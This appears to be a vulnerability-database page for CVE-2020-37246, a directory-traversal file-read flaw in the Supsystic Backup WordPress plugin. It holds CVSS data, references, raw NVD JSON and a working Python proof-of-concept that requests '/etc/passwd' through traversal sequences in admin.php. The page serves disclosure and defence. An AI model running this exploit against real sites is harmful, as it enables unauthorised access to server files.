CVE-2020-37246

Description

Supsystic Backup 2.3.9 contains a local file inclusion vulnerability that allows unauthenticated attackers to read and delete arbitrary files by manipulating the download path parameter. Attackers can modify the download parameter in admin.php requests with directory traversal sequences to access sensitive files like /etc/passwd or delete files via the removeAction parameter.

CVSS Details

CVSS Score

6.2

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

Supsystic Backup <= 2.3.9

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# Exploit Title: Supsystic Backup 2.3.9 - Local File Inclusion (Unauthenticated)
# Date: 2021-01-04
# Exploit Author: VulnCheck
# Vendor Homepage: https://supsystic.com/
# Software Link: https://downloads.wordpress.org/plugin/backup-by-supsystic.zip
# Version: 2.3.9
# Tested on: WordPress 5.6 / Linux

import requests

def exploit_lfi(target_url):
    """
    Exploit the Local File Inclusion vulnerability in Supsystic Backup <= 2.3.9
    """
    # Target endpoint
    url = f"{target_url}/wp-admin/admin.php"
    
    # Parameter vulnerable to directory traversal
    params = {
        "page": "backup-by-supsystic",
        "action": "index",
        "controller": "backup",
        "method": "download",
        "download": "../../../../../../../../etc/passwd"
    }

    try:
        print(f"[*] Sending request to {url}...")
        response = requests.get(url, params=params, timeout=10)
        
        # Check if /etc/passwd is in the response (common LFI check)
        if "root:" in response.text and response.status_code == 200:
            print("[+] Exploit successful! File content retrieved:")
            print("-" * 40)
            print(response.text)
            print("-" * 40)
        else:
            print("[-] Exploit failed or file not found.")
            print(f"Status Code: {response.status_code}")
            
    except requests.exceptions.RequestException as e:
        print(f"[!] An error occurred: {e}")

if __name__ == "__main__":
    target = input("Enter the target URL (e.g., http://localhost/wordpress): ")
    exploit_lfi(target)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2020-37246
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2020-37246
[3] CVE Details https://www.cvedetails.com/cve/CVE-2020-37246/
[4] VulDB https://vuldb.com/cve/CVE-2020-37246
[5] https://downloads.wordpress.org/plugin/backup-by-supsystic.zip
[6] https://supsystic.com/
[7] https://www.exploit-db.com/exploits/49545
[8] https://www.vulncheck.com/advisories/wordpress-plugin-supsystic-backup-local-file-inclusion

Raw JSON Data

JSON

{"cve": {"id": "CVE-2020-37246", "sourceIdentifier": "[email protected]", "published": "2026-05-16T16:16:20.993", "lastModified": "2026-05-18T17:32:04.823", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Supsystic Backup 2.3.9 contains a local file inclusion vulnerability that allows unauthenticated attackers to read and delete arbitrary files by manipulating the download path parameter. Attackers can modify the download parameter in admin.php requests with directory traversal sequences to access sensitive files like /etc/passwd or delete files via the removeAction parameter."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.9, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.2, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.5, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-98"}]}], "references": [{"url": "https://downloads.wordpress.org/plugin/backup-by-supsystic.zip", "source": "[email protected]"}, {"url": "https://supsystic.com/", "source": "[email protected]"}, {"url": "https://www.exploit-db.com/exploits/49545", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/wordpress-plugin-supsystic-backup-local-file-inclusion", "source": "[email protected]"}]}}